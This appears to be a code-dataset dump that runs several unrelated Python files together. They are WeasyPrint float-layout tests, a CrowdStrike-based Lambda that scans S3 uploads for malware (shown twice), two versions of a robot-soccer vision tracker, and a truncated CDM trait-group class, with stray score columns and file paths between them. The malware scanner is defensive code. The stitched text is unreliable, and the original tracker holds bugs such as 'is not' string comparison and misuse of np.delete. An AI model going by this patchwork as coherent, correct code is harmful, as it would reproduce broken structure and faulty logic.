font-family: weasyprint;
line-height: 1;
}
div {
float: left;
width: 50%;
}
</style>
<article>
<span>
1 2 3 4 <div>a b c</div> 5 6
</span>
</article>''')
html, = page.children
body, = html.children
article, = body.children
line1, line2 = article.children
span1, div = line1.children
text1, text2 = span1.children
assert text1.text.strip() == '1 2 3 4'
assert text2.text.strip() == '5'
assert div.position_y == 16
assert div.children[0].children[0].text.strip() == 'a b c'
span2, = line2.children
text, = span2.children
assert text.text.strip() == '6'
@assert_no_logs
def test_float_next_line():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
body {
font-family: weasyprint;
font-size: 20px;
}
p {
text-align: justify;
width: 13em;
}
span {
float: left;
}
</style>
<p>pp pp pp pp <a><span>ppppp</span> aa</a> pp pp pp pp pp</p>''')
html, = page.children
body, = html.children
paragraph, = body.children
line1, line2, line3 = paragraph.children
assert len(line1.children) == 1
assert len(line3.children) == 1
a, p = line2.children
span, a_text = a.children
assert span.position_x == 0
assert span.width == 5 * 20
assert a_text.position_x == a.position_x == 5 * 20
assert a_text.width == a.width == 2 * 20
assert p.position_x == 7 * 20
@assert_no_logs
def test_float_text_indent_1():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
body {
font-family: weasyprint;
font-size: 20px;
}
p {
text-align: justify;
text-indent: 1em;
width: 14em;
}
span {
float: left;
}
</style>
<p><a>aa <span>float</span> aa</a></p>''')
html, = page.children
body, = html.children
paragraph, = body.children
line1, = paragraph.children
a, = line1.children
a1, span, a2 = a.children
span_text, = span.children
assert span.position_x == span_text.position_x == 0
assert span.width == span_text.width == (
(1 + 5) * 20) # text-indent + span text
assert a1.width == 3 * 20
assert a1.position_x == (1 + 5 + 1) * 20 # span + a1 text-indent
assert a2.width == 2 * 20 # leading space collapse
assert a2.position_x == (1 + 5 + 1 + 3) * 20 # span + a1 t-i + a1
@assert_no_logs
def test_float_text_indent_2():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
body {
font-family: weasyprint;
font-size: 20px;
}
p {
text-align: justify;
text-indent: 1em;
width: 14em;
}
span {
float: left;
}
</style>
<p>
oooooooooooo
<a>aa <span>float</span> aa</a></p>''')
html, = page.children
body, = html.children
paragraph, = body.children
line1, line2 = paragraph.children
p1, = line1.children
assert p1.position_x == 1 * 20 # text-indent
assert p1.width == 12 * 20 # p text
a, = line2.children
a1, span, a2 = a.children
span_text, = span.children
assert span.position_x == span_text.position_x == 0
assert span.width == span_text.width == (
(1 + 5) * 20) # text-indent + span text
assert a1.width == 3 * 20
assert a1.position_x == (1 + 5) * 20 # span
assert a2.width == 2 * 20 # leading space collapse
assert a2.position_x == (1 + 5 + 3) * 20 # span + a1
@assert_no_logs
def test_float_text_indent_3():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
body {
font-family: weasyprint;
font-size: 20px;
}
p {
text-align: justify;
text-indent: 1em;
width: 14em;
}
span {
float: right;
}
</style>
<p>
oooooooooooo
<a>aa <span>float</span> aa</a>
oooooooooooo
</p>''')
html, = page.children
body, = html.children
paragraph, = body.children
line1, line2, line3 = paragraph.children
p1, = line1.children
assert p1.position_x == 1 * 20 # text-indent
assert p1.width == 12 * 20 # p text
a, = line2.children
a1, span, a2 = a.children
span_text, = span.children
assert span.position_x == span_text.position_x == (14 - 5 - 1) * 20
assert span.width == span_text.width == (
(1 + 5) * 20) # text-indent + span text
assert a1.position_x == 0 # span
assert a2.width == 2 * 20 # leading space collapse
assert a2.position_x == (14 - 5 - 1 - 2) * 20
p2, = line3.children
assert p2.position_x == 0
assert p2.width == 12 * 20 # p text
@pytest.mark.xfail
@assert_no_logs
def test_float_fail():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
body {
font-family: weasyprint;
font-size: 20px;
}
p {
text-align: justify;
width: 12em;
}
span {
float: left;
background: red;
}
a {
background: yellow;
}
</style>
<p>bb bb pp bb pp pb <a><span>pp pp</span> apa</a> bb bb</p>''')
html, = page.children
body, = html.children
paragraph, = body.children
line1, line2, line3 = paragraph.children | 0.785267 | 0.517876 |
import io
import os
import time
import logging
import urllib.parse
import json
import boto3
from botocore.exceptions import ClientError
# FalconPy SDK - Auth, Sample Uploads and Quick Scan
from falconpy import OAuth2, SampleUploads, QuickScan # pylint: disable=E0401
from functions import generate_manifest, send_to_security_hub
# Maximum file size for scan (35mb)
MAX_FILE_SIZE = 36700160
# Log config
log = logging.getLogger()
log.setLevel(logging.INFO)
# Boto handlers
s3 = boto3.resource('s3')
ssm = boto3.client('ssm')
# Current region
region = os.environ.get('AWS_REGION')
# Mitigate threats?
MITIGATE = bool(json.loads(os.environ.get("MITIGATE_THREATS", "TRUE").lower()))
# Base URL
try:
BASE_URL = os.environ["BASE_URL"]
except KeyError:
BASE_URL = "https://api.crowdstrike.com"
# Grab our SSM parameter store variable names from the environment if they exist
try:
CLIENT_ID_PARAM_NAME = os.environ["CLIENT_ID_PARAM"]
except KeyError:
CLIENT_ID_PARAM_NAME = "BUCKET_SCAN_CLIENT_ID"
try:
CLIENT_SEC_PARAM_NAME = os.environ["CLIENT_SECRET_PARAM"]
except KeyError:
CLIENT_SEC_PARAM_NAME = "BUCKET_SCAN_CLIENT_SECRET"
# Grab our Falcon API credentials from SSM Parameter Store
try:
ssm_response = ssm.get_parameters(Names=[CLIENT_ID_PARAM_NAME, CLIENT_SEC_PARAM_NAME],
WithDecryption=True
)
client_id = ssm_response['Parameters'][0]['Value']
client_secret = ssm_response['Parameters'][1]['Value']
except IndexError as no_creds:
raise SystemExit("Unable to retrieve CrowdStrike Falcon API credentials.") from no_creds
except KeyError as bad_creds:
raise SystemExit("Unable to retrieve CrowdStrike Falcon API credentials.") from bad_creds
# Authenticate to the CrowdStrike Falcon API
auth = OAuth2(creds={
"client_id": client_id,
"client_secret": client_secret
}, base_url=BASE_URL)
# Connect to the Samples Sandbox API
Samples = SampleUploads(auth_object=auth)
# Connect to the Quick Scan API
Scanner = QuickScan(auth_object=auth)
# Main routine
def lambda_handler(event, _): # pylint: disable=R0912,R0914,R0915
"""Lambda execution entry point."""
bucket_name = event['Records'][0]['s3']['bucket']['name']
bucket = s3.Bucket(bucket_name)
key = urllib.parse.unquote_plus(event['Records'][0]['s3']['object']['key'], encoding='utf-8')
upload_file_size = int(
bucket.Object(key=key).get()["ResponseMetadata"]["HTTPHeaders"]["content-length"]
)
if upload_file_size < MAX_FILE_SIZE: # pylint: disable=R1702 # (6 is fine)
try:
filename = os.path.basename(key)
response = Samples.upload_sample(file_name=filename,
file_data=io.BytesIO(
bucket.Object(key=key).get()["Body"].read()
)
)
except Exception as err:
print(f"Error uploading object {key} from bucket {bucket_name} to Falcon X Sandbox. "
"Make sure your API key has the Sample Uploads permission.")
raise err
try:
# Uploaded file unique identifier
upload_sha = response["body"]["resources"][0]["sha256"]
# Scan request ID, generated when the request for the scan is made
scan_id = Scanner.scan_samples(body={"samples": [upload_sha]})["body"]["resources"][0]
scanning = True
# Loop until we get a result or the lambda times out
while scanning:
# Retrieve our scan using our scan ID
scan_results = Scanner.get_scans(ids=scan_id)
try:
if scan_results["body"]["resources"][0]["status"] == "done":
# Scan is complete, retrieve our results (there will be only one)
result = scan_results["body"]["resources"][0]["samples"][0]
# and break out of the loop
scanning = False
else:
# Not done yet, sleep for a bit
time.sleep(3)
except IndexError:
# Results aren't populated yet, skip
pass
if result["sha256"] == upload_sha:
if "no specific threat" in result["verdict"]:
# File is clean
scan_msg = f"No threat found in {key}"
log.info(scan_msg)
elif "unknown" in result["verdict"]:
if "error" in result:
# Error occurred
scan_msg = f"Scan error for {key}: {result['error']}"
log.info(scan_msg)
else:
# Undertermined scan failure
scan_msg = f"Unable to scan {key}"
log.info(scan_msg)
elif "malware" in result["verdict"]:
# Mitigation would trigger from here
scan_msg = f"Verdict for {key}: {result['verdict']}"
detection = {}
detection["sha"] = upload_sha
detection["bucket"] = bucket_name
detection["file"] = key
log.warning(scan_msg)
threat_removed = False
if MITIGATE:
# Remove the threat
try:
threat = s3.Object(bucket_name, key)
threat.delete()
threat_removed = True
except ClientError as err:
log.warning("Unable to remove threat %s from bucket %s", key, bucket_name)
print(f"{err}")
else:
# Mitigation is disabled. Complain about this in the log.
log.warning("Threat discovered (%s). Mitigation disabled, threat persists in %s bucket.",
key,
bucket_name
)
# Inform Security Hub of the threat and our mitigation status
manifest = generate_manifest(detection, region, threat_removed)
_ = send_to_security_hub(manifest, region)
else:
# Unrecognized response
scan_msg = f"Unrecognized response ({result['verdict']}) received from API for {key}."
log.info(scan_msg)
# Clean up the artifact in the sandbox
response = Samples.delete_sample(ids=upload_sha)
if response["status_code"] > 201:
log.warning("Could not remove sample (%s) from sandbox.", key)
return scan_msg
except Exception as err:
print(err)
print(f"Error getting object {key} from bucket {bucket_name}. "
"Make sure they exist and your bucket is in the same region as this function.")
raise err
else:
msg = f"File ({key}) exceeds maximum file scan size ({MAX_FILE_SIZE} bytes), skipped."
log.warning(msg)
return msg
# ██████
# ██ ██
# ██ ████
# ██ ██▓▓████░░
# ████▓▓░░██ ██░░░░
# ██▓▓░░░░██░░░░██░░░░░░
# ██▓▓░░░░██░░██▒▒▓▓██░░░░░░ Let's pour out
# ██▓▓░░░░ ░░██▒▒▓▓▓▓████░░░░ the spoiled bits.
# ██▓▓░░░░ ░░░░▒▒▓▓▓▓████ ░░░░░░
# ██░░░░ ░░░░▒▒▓▓▓▓████ ░░░░░░
# ██░░ ░░░░▒▒▒▒▓▓████ ░░░░
# ██░░░░▒▒▓▓▓▓████ ░░░░░░
# ██▒▒▓▓▓▓████ ░░░░
# ██▓▓████ ░░░░
# ████ ░░ | s3-bucket-protection/lambda/lambda_function.py | import io
import os
import time
import logging
import urllib.parse
import json
import boto3
from botocore.exceptions import ClientError
# FalconPy SDK - Auth, Sample Uploads and Quick Scan
from falconpy import OAuth2, SampleUploads, QuickScan # pylint: disable=E0401
from functions import generate_manifest, send_to_security_hub
# Maximum file size for scan (35mb)
MAX_FILE_SIZE = 36700160
# Log config
log = logging.getLogger()
log.setLevel(logging.INFO)
# Boto handlers
s3 = boto3.resource('s3')
ssm = boto3.client('ssm')
# Current region
region = os.environ.get('AWS_REGION')
# Mitigate threats?
MITIGATE = bool(json.loads(os.environ.get("MITIGATE_THREATS", "TRUE").lower()))
# Base URL
try:
BASE_URL = os.environ["BASE_URL"]
except KeyError:
BASE_URL = "https://api.crowdstrike.com"
# Grab our SSM parameter store variable names from the environment if they exist
try:
CLIENT_ID_PARAM_NAME = os.environ["CLIENT_ID_PARAM"]
except KeyError:
CLIENT_ID_PARAM_NAME = "BUCKET_SCAN_CLIENT_ID"
try:
CLIENT_SEC_PARAM_NAME = os.environ["CLIENT_SECRET_PARAM"]
except KeyError:
CLIENT_SEC_PARAM_NAME = "BUCKET_SCAN_CLIENT_SECRET"
# Grab our Falcon API credentials from SSM Parameter Store
try:
ssm_response = ssm.get_parameters(Names=[CLIENT_ID_PARAM_NAME, CLIENT_SEC_PARAM_NAME],
WithDecryption=True
)
client_id = ssm_response['Parameters'][0]['Value']
client_secret = ssm_response['Parameters'][1]['Value']
except IndexError as no_creds:
raise SystemExit("Unable to retrieve CrowdStrike Falcon API credentials.") from no_creds
except KeyError as bad_creds:
raise SystemExit("Unable to retrieve CrowdStrike Falcon API credentials.") from bad_creds
# Authenticate to the CrowdStrike Falcon API
auth = OAuth2(creds={
"client_id": client_id,
"client_secret": client_secret
}, base_url=BASE_URL)
# Connect to the Samples Sandbox API
Samples = SampleUploads(auth_object=auth)
# Connect to the Quick Scan API
Scanner = QuickScan(auth_object=auth)
# Main routine
def lambda_handler(event, _): # pylint: disable=R0912,R0914,R0915
"""Lambda execution entry point."""
bucket_name = event['Records'][0]['s3']['bucket']['name']
bucket = s3.Bucket(bucket_name)
key = urllib.parse.unquote_plus(event['Records'][0]['s3']['object']['key'], encoding='utf-8')
upload_file_size = int(
bucket.Object(key=key).get()["ResponseMetadata"]["HTTPHeaders"]["content-length"]
)
if upload_file_size < MAX_FILE_SIZE: # pylint: disable=R1702 # (6 is fine)
try:
filename = os.path.basename(key)
response = Samples.upload_sample(file_name=filename,
file_data=io.BytesIO(
bucket.Object(key=key).get()["Body"].read()
)
)
except Exception as err:
print(f"Error uploading object {key} from bucket {bucket_name} to Falcon X Sandbox. "
"Make sure your API key has the Sample Uploads permission.")
raise err
try:
# Uploaded file unique identifier
upload_sha = response["body"]["resources"][0]["sha256"]
# Scan request ID, generated when the request for the scan is made
scan_id = Scanner.scan_samples(body={"samples": [upload_sha]})["body"]["resources"][0]
scanning = True
# Loop until we get a result or the lambda times out
while scanning:
# Retrieve our scan using our scan ID
scan_results = Scanner.get_scans(ids=scan_id)
try:
if scan_results["body"]["resources"][0]["status"] == "done":
# Scan is complete, retrieve our results (there will be only one)
result = scan_results["body"]["resources"][0]["samples"][0]
# and break out of the loop
scanning = False
else:
# Not done yet, sleep for a bit
time.sleep(3)
except IndexError:
# Results aren't populated yet, skip
pass
if result["sha256"] == upload_sha:
if "no specific threat" in result["verdict"]:
# File is clean
scan_msg = f"No threat found in {key}"
log.info(scan_msg)
elif "unknown" in result["verdict"]:
if "error" in result:
# Error occurred
scan_msg = f"Scan error for {key}: {result['error']}"
log.info(scan_msg)
else:
# Undertermined scan failure
scan_msg = f"Unable to scan {key}"
log.info(scan_msg)
elif "malware" in result["verdict"]:
# Mitigation would trigger from here
scan_msg = f"Verdict for {key}: {result['verdict']}"
detection = {}
detection["sha"] = upload_sha
detection["bucket"] = bucket_name
detection["file"] = key
log.warning(scan_msg)
threat_removed = False
if MITIGATE:
# Remove the threat
try:
threat = s3.Object(bucket_name, key)
threat.delete()
threat_removed = True
except ClientError as err:
log.warning("Unable to remove threat %s from bucket %s", key, bucket_name)
print(f"{err}")
else:
# Mitigation is disabled. Complain about this in the log.
log.warning("Threat discovered (%s). Mitigation disabled, threat persists in %s bucket.",
key,
bucket_name
)
# Inform Security Hub of the threat and our mitigation status
manifest = generate_manifest(detection, region, threat_removed)
_ = send_to_security_hub(manifest, region)
else:
# Unrecognized response
scan_msg = f"Unrecognized response ({result['verdict']}) received from API for {key}."
log.info(scan_msg)
# Clean up the artifact in the sandbox
response = Samples.delete_sample(ids=upload_sha)
if response["status_code"] > 201:
log.warning("Could not remove sample (%s) from sandbox.", key)
return scan_msg
except Exception as err:
print(err)
print(f"Error getting object {key} from bucket {bucket_name}. "
"Make sure they exist and your bucket is in the same region as this function.")
raise err
else:
msg = f"File ({key}) exceeds maximum file scan size ({MAX_FILE_SIZE} bytes), skipped."
log.warning(msg)
return msg
# ██████
# ██ ██
# ██ ████
# ██ ██▓▓████░░
# ████▓▓░░██ ██░░░░
# ██▓▓░░░░██░░░░██░░░░░░
# ██▓▓░░░░██░░██▒▒▓▓██░░░░░░ Let's pour out
# ██▓▓░░░░ ░░██▒▒▓▓▓▓████░░░░ the spoiled bits.
# ██▓▓░░░░ ░░░░▒▒▓▓▓▓████ ░░░░░░
# ██░░░░ ░░░░▒▒▓▓▓▓████ ░░░░░░
# ██░░ ░░░░▒▒▒▒▓▓████ ░░░░
# ██░░░░▒▒▓▓▓▓████ ░░░░░░
# ██▒▒▓▓▓▓████ ░░░░
# ██▓▓████ ░░░░
# ████ ░░ | 0.36693 | 0.064653 |
import cv2
import numpy as np
from utils import ShapeDetector
from vision.msg import VisionMessage
offset = 15
class ImageTracker:
    """Locate the ball and up to three allied robots in a colour-segmented frame.

    ``segm_limits`` holds five (lower, upper) colour-range pairs:
    index 0 is the ball colour, indices 1-3 are the per-robot id-marker
    colours and index 4 is the team-shirt colour.  ``kernel`` is the
    structuring element used for morphological noise removal.
    """

    def __init__(self, segm_limits, kernel):
        self.shape_detector = ShapeDetector()
        self.kernel = kernel
        self.frame = None  # current frame, supplied via set_frame()
        self.vision_msg = VisionMessage()
        self.contours = None
        self.segm_limits = np.array(segm_limits)
        self.ball_position = [0, 0]
        self.buffer_ball = [0, 0]  # last known ball position, used as fallback
        self.allies_shirt = []  # shirt centroids detected in the current frame
        self.allies_position = [[], [], []]
        self.allies_angles = [0, 0, 0]
        # One flag per possible robot; an ndarray so that the truthiness of
        # robots_found[i] is consistent with what find_robots() stores.
        self.robots_found = np.array([[False]] * 6)

    def set_frame(self, frame):
        """Store the frame that the next find_colours() call will analyse."""
        self.frame = frame

    def find_colours(self):
        """Run the full detection pipeline and refresh the vision message."""
        self.find_ball()
        self.find_team()
        self.mount_msg()

    def find_team(self):
        """Find all team shirts, then identify which robot each one is."""
        self.find_allies_shirt()
        self.find_robots()

    def _centroid(self, contour):
        """Return the (x, y) centroid of *contour*, or None if degenerate."""
        moments = cv2.moments(contour)
        if moments['m00'] == 0:
            return None
        return (int(moments['m10'] / moments['m00']),
                int(moments['m01'] / moments['m00']))

    def find_ball(self):
        """Segment the ball colour and update ball_position.

        Falls back to the last known position when no usable round blob is
        visible in the current frame.
        """
        mask = cv2.inRange(self.frame, self.segm_limits[0][0], self.segm_limits[0][1])
        mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, self.kernel)
        self.contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL,
                                            cv2.CHAIN_APPROX_TC89_KCOS)
        # Keep only round blobs; string *equality* (not identity) is required.
        self.contours = [c for c in self.contours
                         if self.shape_detector.detect(c) == "circle"]
        if self.contours:
            centre = self._centroid(self.contours[0])
            if centre is None:
                # Degenerate contour: reuse the last known position.
                self.ball_position = list(self.buffer_ball)
            else:
                self.ball_position = list(centre)
                self.buffer_ball = list(centre)
        else:
            self.ball_position = self.buffer_ball

    def find_robots(self):
        """Identify each detected shirt as robot 0, 1 or 2.

        For every shirt centroid a small square ROI is cut from the frame and
        the three id-marker colour ranges are tried in order; the first range
        that yields a usable triangular contour decides the robot id.
        """
        self.robots_found = np.array([[False]] * 6)
        self.allies_angles = [0, 0, 0]
        for shirt_x, shirt_y in self.allies_shirt:
            robot_roi = self.frame[shirt_y - offset:shirt_y + offset,
                                   shirt_x - offset:shirt_x + offset]
            for robot_id, limits in enumerate(self.segm_limits[1:4]):
                marker = self._find_marker(robot_roi, limits)
                if marker is not None:
                    self.allies_position[robot_id] = [shirt_x, shirt_y]
                    self.robots_found[robot_id] = True
                    # The shirt centre sits at (offset, offset) inside the ROI.
                    self.allies_angles[robot_id] = self.find_angle(
                        marker[0], marker[1], offset, offset)
                    break

    def _find_marker(self, roi, limits):
        """Return the (x, y) ROI coordinates of an id marker, or None.

        The marker is the centroid of the first triangular contour within the
        given colour range; tiny blobs (< 100 px area) are discarded as noise.
        A degenerate contour yields (0, 0), matching the previous behaviour.
        """
        mask = cv2.inRange(roi, limits[0], limits[1])
        if mask is None:
            return None
        mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, self.kernel)
        self.contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL,
                                            cv2.CHAIN_APPROX_TC89_KCOS)
        if not self.contours:
            return None
        candidates = [c for c in self.contours
                      if cv2.contourArea(c) >= 100
                      and self.shape_detector.detect(c) == "triangle"]
        if not candidates:
            return None
        return self._centroid(candidates[0]) or (0, 0)

    def find_allies_shirt(self):
        """Collect the centroid of every shirt-coloured blob in the frame."""
        mask = cv2.inRange(self.frame, self.segm_limits[4][0], self.segm_limits[4][1])
        mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, self.kernel)
        self.contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL,
                                            cv2.CHAIN_APPROX_TC89_KCOS)
        self.allies_shirt = []
        for contour in self.contours or []:
            centre = self._centroid(contour)
            self.allies_shirt.append(list(centre) if centre else [0, 0])

    def find_angle(self, id_x, id_y, shirt_x, shirt_y):
        """Return the heading (radians) from the shirt centre to the id marker.

        The y delta is negated because image y grows downwards while the
        field frame's y grows upwards.
        """
        dx = id_x - shirt_x
        dy = -(id_y - shirt_y)
        return np.arctan2(dy, dx)

    def mount_msg(self):
        """Copy the current detections into the outgoing VisionMessage."""
        for robot in range(3):
            if self.robots_found[robot]:
                self.vision_msg.found[robot] = True
                self.vision_msg.x[robot] = self.allies_position[robot][0]
                self.vision_msg.y[robot] = self.allies_position[robot][1]
                self.vision_msg.th[robot] = self.allies_angles[robot]
        self.vision_msg.ball_x = self.ball_position[0]
        self.vision_msg.ball_y = self.ball_position[1]

    def get_vision_msg(self):
        """Return the most recently assembled VisionMessage."""
        return self.vision_msg
import numpy as np
from utils import ShapeDetector
from vision.msg import VisionMessage
offset = 15
class ImageTracker:
def __init__(self, segm_limits, kernel):
self.shape_detector = ShapeDetector()
self.kernel = kernel
self.frame = None
self.vision_msg = VisionMessage()
self.contours = None
self.segm_limits = np.array(segm_limits)
self.ball_position = [0, 0]
self.buffer_ball = [0, 0]
self.allies_shirt = []
self.allies_position = [[], [], []]
self.allies_angles = [0, 0, 0]
self.robots_found = [[False], [False], [False], [False], [False], [False]]
def set_frame(self, frame):
self.frame = frame
def find_colours(self):
self.find_ball()
self.find_team()
self.mount_msg()
def find_team(self):
self.find_allies_shirt()
self.find_robots()
def find_ball(self):
mask = cv2.inRange(self.frame, self.segm_limits[0][0], self.segm_limits[0][1])
mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, self.kernel)
self.contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
for contour in self.contours:
shape = self.shape_detector.detect(contour)
if shape is not "circle":
self.contours = np.delete(self.contours, np.where(contour == self.contours))
if self.contours:
M = cv2.moments(self.contours[0])
if M['m00'] == 0:
if self.buffer_ball == [0, 0]:
self.ball_position = [0, 0]
else:
self.ball_position = self.buffer_ball
else:
cx = int(M['m10']/M['m00'])
cy = int(M['m01']/M['m00'])
self.ball_position = [cx, cy]
self.buffer_ball = [cx, cy]
else:
self.ball_position = self.buffer_ball
def find_robots(self):
self.robots_found = np.array([[False], [False], [False], [False], [False], [False]])
self.allies_angles = [0, 0, 0]
for position in self.allies_shirt:
shirt_x = position[0]
shirt_y = position[1]
xi, xf = shirt_x - offset, shirt_x + offset
yi, yf = shirt_y - offset, shirt_y + offset
robot_roi = self.frame[yi:yf, xi:xf]
# Find robot 0
mask = cv2.inRange(robot_roi, self.segm_limits[1][0], self.segm_limits[1][1])
if isinstance(mask, type(None)):
pass
else:
mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, self.kernel)
self.contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
if self.contours:
for c in self.contours:
if cv2.contourArea(c) < 100:
index = np.where(self.contours==c)
self.contours = np.delete(self.contours,index)
for contour in self.contours:
shape = self.shape_detector.detect(contour)
if shape is not "triangle":
self.contours = np.delete(self.contours, np.where(contour == self.contours))
M = cv2.moments(self.contours[0])
if M['m00'] == 0:
local_id_x, local_id_y = 0, 0
else:
local_id_x = int(M['m10']/M['m00'])
local_id_y = int(M['m01']/M['m00'])
global_id_x = local_id_x + shirt_x + offset
global_id_y = local_id_y + shirt_y + offset
true_x = (global_id_x/2) + shirt_x
true_y = (global_id_y/2) + shirt_y
self.allies_position[0] = [shirt_x, shirt_y]
self.robots_found[0] = True
self.allies_angles[0] = self.find_angle(local_id_x, local_id_y, offset, offset)
else:
# Find robot 1
mask = cv2.inRange(robot_roi, self.segm_limits[2][0], self.segm_limits[2][1])
if isinstance(mask, type(None)):
pass
else:
mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, self.kernel)
self.contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
if self.contours:
for contour in self.contours:
shape = self.shape_detector.detect(contour)
if shape is not "triangle":
self.contours = np.delete(self.contours, np.where(contour == self.contours))
M = cv2.moments(self.contours[0])
if M['m00'] == 0:
local_id_x, local_id_y = 0, 0
else:
local_id_x = int(M['m10']/M['m00'])
local_id_y = int(M['m01']/M['m00'])
global_id_x = local_id_x + shirt_x + offset
global_id_y = local_id_y + shirt_y + offset
true_x = (global_id_x/2) + shirt_x
true_y = (global_id_y/2) + shirt_y
self.allies_position[1] = [shirt_x, shirt_y]
self.robots_found[1] = True
self.allies_angles[1] = self.find_angle(local_id_x, local_id_y, offset, offset)
else:
# Find robot 2
mask = cv2.inRange(robot_roi, self.segm_limits[3][0], self.segm_limits[3][1])
if isinstance(mask, type(None)):
pass
else:
mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, self.kernel)
self.contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
if self.contours:
for contour in self.contours:
shape = self.shape_detector.detect(contour)
if shape is not "triangle":
self.contours = np.delete(self.contours, np.where(contour == self.contours))
M = cv2.moments(self.contours[0])
if M['m00'] == 0:
local_id_x, local_id_y = 0, 0
else:
local_id_x = int(M['m10']/M['m00'])
local_id_y = int(M['m01']/M['m00'])
global_id_x = local_id_x + shirt_x + offset
global_id_y = local_id_y + shirt_y + offset
true_x = (global_id_x/2) + shirt_x
true_y = (global_id_y/2) + shirt_y
self.allies_position[2] = [shirt_x, shirt_y]
self.robots_found[2] = True
self.allies_angles[2] = self.find_angle(local_id_x, local_id_y, offset, offset)
def find_allies_shirt(self):
mask = cv2.inRange(self.frame, self.segm_limits[4][0], self.segm_limits[4][1])
mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, self.kernel)
self.contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
self.allies_shirt = []
if self.contours:
for contour in self.contours:
M = cv2.moments(contour)
if M['m00'] == 0:
self.allies_shirt.append([0, 0])
else:
cx = int(M['m10']/M['m00'])
cy = int(M['m01']/M['m00'])
self.allies_shirt.append([cx, cy])
def find_angle(self, id_x, id_y, shirt_x, shirt_y):
# Angle will be calculated as th = arctg(dy/dx)
# -1 'cause the y axis of a image grows in down direction, so in fact we're doing dy = shirt.cy - clr_id.cy
dx = id_x - shirt_x
dy = -1 * (id_y - shirt_y)
theta = np.arctan2(dy, dx)
return theta
def mount_msg(self):
for robot in xrange(3):
if self.robots_found[robot] == True:
self.vision_msg.found[robot] = True
self.vision_msg.x[robot] = self.allies_position[robot][0]
self.vision_msg.y[robot] = self.allies_position[robot][1]
self.vision_msg.th[robot] = self.allies_angles[robot]
self.vision_msg.ball_x = self.ball_position[0]
self.vision_msg.ball_y = self.ball_position[1]
def get_vision_msg(self):
return self.vision_msg | 0.203312 | 0.217576 |
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
from typing import Optional, TYPE_CHECKING
from cdm.enums import CdmObjectType
from cdm.utilities import ResolveOptions, logger
from cdm.enums import CdmLogCode
from .cdm_object_def import CdmObjectDefinition
if TYPE_CHECKING:
from cdm.objectmodel import CdmCorpusContext
from cdm.utilities import VisitCallback
class CdmTraitGroupDefinition(CdmObjectDefinition):
    """
    The CDM definition of a Trait Group object: a named, reusable collection
    (grouping) of one or more traits.
    """

    def __init__(self, ctx: 'CdmCorpusContext', trait_group_name: str) -> None:
        super().__init__(ctx)
        self._TAG = CdmTraitGroupDefinition.__name__
        # The name under which this group of traits is referenced.
        self.trait_group_name = trait_group_name  # type: str

    @property
    def object_type(self) -> CdmObjectType:
        return CdmObjectType.TRAIT_GROUP_DEF

    def get_name(self):
        """Return the trait group's name."""
        return self.trait_group_name

    def copy(self, res_opt: Optional['ResolveOptions'] = None, host: Optional['CdmTraitGroupDefinition'] = None) \
            -> 'CdmTraitGroupDefinition':
        """Copy this definition, or refresh *host* in place when given."""
        res_opt = res_opt or ResolveOptions(wrt_doc=self, directives=self.ctx.corpus.default_resolution_directives)
        if host:
            result = host
            result.trait_group_name = self.trait_group_name
        else:
            result = CdmTraitGroupDefinition(self.ctx, self.trait_group_name)
        self._copy_def(res_opt, result)
        return result

    def validate(self) -> bool:
        """Log an integrity-check error and return False when the name is missing."""
        if self.trait_group_name:
            return True
        missing_fields = ['trait_group_name']
        logger.error(self.ctx, self._TAG, 'validate', self.at_corpus_path,
                     CdmLogCode.ERR_VALDN_INTEGRITY_CHECK_FAILURE, self.at_corpus_path,
                     ', '.join('\'' + field + '\'' for field in missing_fields))
        return False

    def is_derived_from(self, base: str, res_opt: Optional['ResolveOptions'] = None) -> bool:
        # Trait groups do not take part in inheritance.
        return False

    def visit(self, path_from: str, pre_children: 'VisitCallback', post_children: 'VisitCallback') -> bool:
        """Visit this object with the given pre/post callbacks."""
        path = ''
        if self.ctx.corpus._block_declared_path_changes is False:
            path = self._declared_path
            if not path:
                path = path_from + self.trait_group_name
                self._declared_path = path
        if pre_children and pre_children(self, path):
            return False
        if self._visit_def(path, pre_children, post_children):
            return True
        return bool(post_children and post_children(self, path))

    def _construct_resolved_traits(self, rtsb: 'ResolvedTraitSetBuilder', res_opt: 'ResolveOptions') -> None:
        super()._construct_resolved_traits_def(None, rtsb, res_opt)

    def _construct_resolved_attributes(self, res_opt: 'ResolveOptions', under: Optional['CdmAttributeContext'] = None) \
            -> None:
        # Trait groups contribute no attributes.
        return None
# Licensed under the MIT License. See License.txt in the project root for license information.
from typing import Optional, TYPE_CHECKING
from cdm.enums import CdmObjectType
from cdm.utilities import ResolveOptions, logger
from cdm.enums import CdmLogCode
from .cdm_object_def import CdmObjectDefinition
if TYPE_CHECKING:
from cdm.objectmodel import CdmCorpusContext
from cdm.utilities import VisitCallback
class CdmTraitGroupDefinition(CdmObjectDefinition):
"""
The CDM definition of a Trait Group object, representing a collection (grouping) of one or more traits.
"""
def __init__(self, ctx: 'CdmCorpusContext', trait_group_name: str) -> None:
super().__init__(ctx)
self._TAG = CdmTraitGroupDefinition.__name__
# the trait name.
